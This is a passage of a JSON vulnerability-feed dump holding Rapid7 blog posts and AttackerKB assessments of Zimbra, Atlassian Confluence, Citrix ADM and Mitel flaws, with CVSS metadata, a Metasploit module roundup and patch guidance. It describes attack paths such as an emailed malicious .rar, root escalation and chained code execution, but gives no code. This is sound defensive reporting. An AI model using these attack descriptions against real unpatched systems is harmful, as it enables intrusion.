Organizations that use Zimbra should update immediately, without waiting for a regular patch cycle.\n\nIf you are unable to update your Zimbra version, you can apply [Zimbra's recommended workaround](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>), which is to install the `pax` archive utility, then **restart Zimbra or reboot**. We strongly recommend patching, as 9.0.0 P27 also resolves several other vulnerabilities, including [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>), a root privilege escalation.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-41352 via an authenticated vulnerability check (supported by agent and scanner based assessments) available in the October 6 content release (`ContentOnly-content-1.1.2667-202210061843`). This check will identify systems with an affected version of Zimbra Collaboration Suite installed where the `pax` package is not available. There is no change required to the default scan templates to enable this check.\n\nOur engineering team is working on updated vulnerability checks to account for the newly released patch.\n\n## Updates\n\n**October 6, 2022, 3:30pm ET:** Updated to include information on the newly released InsightVM/Nexpose check for CVE-2022-41352.\n\n**October 11, 2022:** Zimbra has released Zimbra Collaboration Suite 9.0.0 P27 to address this vulnerability, as well as other security issues. 
Our engineering team is working on updating our vulnerability checks to account for the patch.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T17:13:34", "type": "rapid7blog", "title": "Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1197", "CVE-2022-30333", "CVE-2022-37393", "CVE-2022-41352"], "modified": "2022-10-06T17:13:34", "id": "RAPID7BLOG:9191651E2ECCE625AEB7BDCAD1EA43F6", "href": "https://blog.rapid7.com/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-12T19:33:06", "description": "## Putting in the work!\n\nThis week we\u2019re extra grateful for the fantastic contributions our community makes to Metasploit. 
The Metasploit team landed more than 5 PRs each from [Ron Bowes](<https://github.com/rbowes-r7>) and [bcoles](<https://github.com/bcoles>), adding some great new capabilities.\n\n[Ron Bowes](<https://github.com/rbowes-r7>) contributed four new modules targeting UnRAR, Zimbra, and ManageEngine ADAudit Plus. These modules offer Metasploit users some excellent new vectors to leverage against targets.\n\nContributions from [bcoles](<https://github.com/bcoles>) offer improvements to various session interactions to make gathering data on targets more robust and consistent.\n\n## Have you seen Cassandra?\n\nAre you using tools to visualize your data? If you are using [`cassandra-web`](<https://github.com/avalanche123/cassandra-web>), a tool made specifically to help you "see" what Cassandra holds, there are new toys for attackers to use to access much more. The new module from [krastanoel](<https://github.com/krastanoel>) targets `cassandra-web` <= 0.5.0 with a directory traversal to read lots of those sensitive details off the target.\n\n## New module content (6)\n\n * [Cassandra Web File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/16851>) by Jeremy Brown and [krastanoel](<https://github.com/krastanoel>) \\- This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.\n * [UnRAR Path Traversal (CVE-2022-30333)](<https://github.com/rapid7/metasploit-framework/pull/16796>) by [Ron Bowes](<https://github.com/rbowes-r7>) and [Simon Scannell](<https://twitter.com/scannell_simon>), which exploits [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333?referrer=blog>) \\- This adds two modules for CVE-2022-30333, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open-source version 6.1.6 and earlier). 
The first module creates a `.rar` with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. This module generates the `.rar` file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.\n * [Webmin Package Updates RCE](<https://github.com/rapid7/metasploit-framework/pull/16856>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and Emir Polat, which exploits [CVE-2022-36446](<https://attackerkb.com/topics/q1u5OOKCDH/cve-2022-36446?referrer=blog>) \\- This module exploits an arbitrary command injection in Webmin versions prior to 1.997.\n * [UnRAR Path Traversal in Zimbra (CVE-2022-30333)](<https://github.com/rapid7/metasploit-framework/pull/16796>) by [Ron Bowes](<https://github.com/rbowes-r7>) and [Simon Scannell](<https://twitter.com/scannell_simon>), which exploits [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333?referrer=blog>) \\- This adds two modules for `CVE-2022-30333`, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open source version 6.1.6 and earlier). The first module creates a `.rar` with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. 
This module generates the `.rar` file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.\n * [Zimbra zmslapd arbitrary module load](<https://github.com/rapid7/metasploit-framework/pull/16807>) by [Darren Martyn](<https://twitter.com/_darrenmartyn>) and [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393?referrer=blog>) \\- This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.\n * [ManageEngine ADAudit Plus CVE-2022-28219](<https://github.com/rapid7/metasploit-framework/pull/16758>) by Naveen Sunkavally and [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-28219](<https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219?referrer=blog>) \\- This adds a module that chains a Java deserialization, a directory traversal, and a blind XXE injection vulnerability to gain unauthenticated code execution against vulnerable versions of ManageEngine ADAudit Plus.\n\n## Enhancements and features (6)\n\n * [#16800](<https://github.com/rapid7/metasploit-framework/pull/16800>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This adds support for OpenSSL 3 compatibility with legacy ciphers.\n * [#16841](<https://github.com/rapid7/metasploit-framework/pull/16841>) from [bcoles](<https://github.com/bcoles>) \\- This updates the `post/windows/gather/enum_powershell_env` module with a code cleanup and expands the module to support non-Meterpreter session types such as shell sessions and PowerShell sessions.\n * [#16873](<https://github.com/rapid7/metasploit-framework/pull/16873>) from [bcoles](<https://github.com/bcoles>) \\- This PR cleans up enum_artifacts, adds documentation, error handling, YAML file parsing, and support for non-Meterpreter sessions.\n * [#16875](<https://github.com/rapid7/metasploit-framework/pull/16875>) from 
[bcoles](<https://github.com/bcoles>) \\- This PR removes the enum_putty Meterpreter script in favor of the existing post module.\n * [#16876](<https://github.com/rapid7/metasploit-framework/pull/16876>) from [bcoles](<https://github.com/bcoles>) \\- Removes the enum_logged_on_users Meterpreter script in favor of the existing post module.\n * [#16878](<https://github.com/rapid7/metasploit-framework/pull/16878>) from [bcoles](<https://github.com/bcoles>) \\- Adds partial support for non-Meterpreter sessions to the enum_logged_on_users post module and makes use of the read_profile_list method. Resolves Rubocop and msftidy_docs violations.\n\n## Bugs fixed (1)\n\n * [#16872](<https://github.com/rapid7/metasploit-framework/pull/16872>) from [bcoles](<https://github.com/bcoles>) \\- This PR fixes shell_registry_getvalinfo, which was truncating registry values at the first space, and normalize_key, which crashed when only a hive name was passed to the function while running on a shell session.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.2.11...6.2.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-04T11%3A39%3A27-05%3A00..2022-08-10T15%3A45%3A22-05%3A00%22>)\n * [Full diff 6.2.11...6.2.12](<https://github.com/rapid7/metasploit-framework/compare/6.2.11...6.2.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T18:52:27", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28219", "CVE-2022-30333", "CVE-2022-36446", "CVE-2022-37393"], "modified": "2022-08-12T18:52:27", "id": "RAPID7BLOG:84EC5F57BD07F535627F51F28B2424B1", "href": "https://blog.rapid7.com/2022/08/12/metasploit-weekly-wrap-up-171/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-29T21:59:42", "description": "\n\nExploitation is underway for one of the [trio of critical Atlassian vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) that were published last week affecting several of the company\u2019s on-premises products. 
Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of [CVE-2022-26134 in Confluence Server and Confluence Data Center](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>).\n\n**CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:**\n\n * Confluence Server\n * Confluence Data Center\n\n**CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:**\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Crucible\n * Fisheye\n * Jira Server and Data Center\n * Jira Service Management Server and Data Center\n\n## CVE-2022-26138: Hardcoded password in Questions for Confluence app\n\nThe most critical of these three is [CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization\u2019s Confluence instance. 
Unsurprisingly, it didn\u2019t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.\n\n## Affected versions\n\n * Questions for Confluence 2.7.x: 2.7.34, 2.7.35\n * Questions for Confluence 3.0.x: 3.0.2\n\n## Mitigation guidance\n\nOrganizations using on-prem Confluence should follow Atlassian\u2019s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian\u2019s advisory also includes information on how to look for evidence of exploitation. An [FAQ](<https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html>) has also been provided.\n\n> Please note: Atlassian\u2019s [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has a very important call-out that \u201cuninstalling the Questions for Confluence app does not remediate this vulnerability.\u201d\n\n## CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities\n\nTwo other vulnerabilities were announced at the same time, [CVE-2022-26136 and CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>), which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. 
Cloud versions of Atlassian have already been fixed by the company.\n\nThe list of affected versions is long and can be found on [Atlassian\u2019s Security Advisory](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>).\n\nWhile the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-26138 with a remote vulnerability check released on July 29, 2022 (ContentOnly-content-1.1.2602-202207292027).\n\n## Updates\n\n07/29/2022 - 5:30 PM EDT \nUpdated Rapid7 customers section to include information on a new remote vulnerability check.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T19:26:38", "type": "rapid7blog", "title": "Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-27T19:26:38", "id": "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "href": "https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T21:57:35", "description": "\n\nOn Monday, June 14, 2022, Citrix published an [advisory on CVE-2022-27511](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>), a critical improper access control vulnerability affecting their Application Delivery Management (ADM) product.\n\nA remote, unauthenticated attacker can leverage CVE-2022-27511 to reset administrator credentials to the default value at the next reboot. This allows the attacker to use SSH and the default administrator credentials to access the affected management console. The vulnerability has been patched in Citrix ADM 13.1-21.53 and ADM 13.0-85.19 and should be applied as soon as possible. Versions of Citrix ADM before 13.0 and 13.1 are end of life, so Citrix will not make patches available for these versions. Users still on version 12.x are encouraged to upgrade to a supported version.\n\nAt the time of this writing, no exploitation has been observed, and no exploits have been made publicly available. However, given the nature of the vulnerability and the footprint of Citrix ADM, we anticipate that exploitation will happen as soon as an exploit is made available.\n\n## Mitigation guidance\n\nCitrix ADM customers should upgrade their versions of both ADM server and agents as soon as possible. 
Citrix notes in their [advisory](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>) that they strongly recommend that network traffic to the Citrix ADM\u2019s IP address be segmented, either physically or logically, from standard network traffic.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to [CVE-2022-27511](<https://www.rapid7.com/db/vulnerabilities/citrix-adm-cve-2022-27511/>) with an authenticated vulnerability check available in the June 22, 2022 content release. Please note that this check does not support versions 13.1+ of Citrix ADM.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T20:03:55", "type": "rapid7blog", "title": "CVE-2022-27511: Citrix ADM Remote Device Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511"], "modified": "2022-06-16T20:03:55", "id": "RAPID7BLOG:C3FB7B0BA665AC291B6331292F32F47A", "href": 
"https://blog.rapid7.com/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}}, {"lastseen": "2022-07-08T21:58:14", "description": "\n\nIn April 2022, telecommunications company Mitel [published a security advisory](<https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_22-0002-001-v2.pdf>) on CVE-2022-29499, a data validation vulnerability in the Service Appliance component of [MiVoice Connect](<https://www.mitel.com/products/business-phone-systems/on-site/mivoice-connect>), a business communications product. The vulnerability, which was unpatched at time of publication, arose from insufficient data validation for a diagnostic script and potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. CVE-2022-29499 has a CVSSv3 score of 9.8.\n\nOn June 23, 2022, security firm Crowdstrike published an [analysis](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) on a ransomware intrusion attempt that had targeted CVE-2022-29499 \u2014 which at the time of detection was an undisclosed zero-day vulnerability \u2014 as an initial access vector. Over the past two weeks, Rapid7 Managed Detection and Response (MDR) has also observed a small number of intrusions that have leveraged CVE-2022-29499 as an initial access vector.\n\nThere is currently no indication that a large number of these appliances are exposed to the public internet, and we have no evidence that this vulnerability is being targeted in wider-scale ransomware campaigns. 
We are conscious of the fact, however, that the proliferation of ransomware in general has continued to shape risk models for many organizations, and that network perimeter devices are tempting targets for a variety of attackers.\n\n## Affected products\n\nCVE-2022-29499 affects MiVoice Connect deployments (including earlier versions 14.2) that include the MiVoice Connect Service Appliances, SA 100, SA 400 and/or Virtual SA. Vulnerable firmware versions include R19.2 SP3 (22.20.2300.0) and earlier, and R14.x and earlier. See Mitel [product security advisory 22-0002](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) and their [security bulletin](<https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_22-0002-001-v2.pdf>) for additional information.\n\n## Mitigation guidance\n\nMitel MiVoice Connect customers who use vulnerable versions of the Service Appliance in their deployments should update to a fixed version of the appliance immediately. Mitel released patches for CVE-2022-29499 in early June 2022; organizations that have not updated the firmware on their appliances since before that timeframe should apply fixes as soon as possible. Appliances should not be exposed to the open internet. 
Administrators should also review network filters for these devices and employ the principle of least privilege.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-29499 with a remote, version-based vulnerability check in the July 8, 2022 content release.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-07T19:09:10", "type": "rapid7blog", "title": "Exploitation of Mitel MiVoice Connect SA CVE-2022-29499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-07-07T19:09:10", "id": "RAPID7BLOG:F35EA4220CACE146EF8E5F845F2B51BF", "href": "https://blog.rapid7.com/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-06-03T17:15:08", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. 
An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 19, 2022 4:18pm UTC reported:\n\nThis is really bad \u2013 remote root on an organization\u2019s email server, if combined with other (currently 0-day vulnerabilities). Patch ASAP!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:00:00", "type": "attackerkb", "title": "CVE-2022-27925", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-11-03T00:00:00", "id": "AKB:48EF6C32-59B4-4AD7-BE9A-0EE8A2E86072", "href": "https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:15:07", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. 
When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 23, 2022 4:47pm UTC reported:\n\nThis is a privilege-escalation vulnerability in Zimbra, to go from the `zimbra` user to `root`. As of writing, this has been publicly known for nearly a year, and reported to Zimbra for about a month.\n\nAlthough it requires an account, there have been a whole pile of recent CVEs that get you there \u2013 [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis>), [CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>), and [CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2022-37393", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-30333", "CVE-2022-37393"], "modified": 
"2022-08-16T00:00:00", "id": "AKB:519DD30E-F9A7-4A5E-A57B-DF4E4B9B20F1", "href": "https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:45:19", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands become unescaped, causing an overwrite of arbitrary cached entries.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 16, 2022 8:10pm UTC reported:\n\nUltimately, this is annoying and unreliable to exploit, but we did get it working and confirm it\u2019s a problem.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2022-27924", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-30333"], "modified": "2022-08-16T00:00:00", "id": "AKB:C83F5B74-AC72-42D5-A71F-C8F4144C4C9D", "href": 
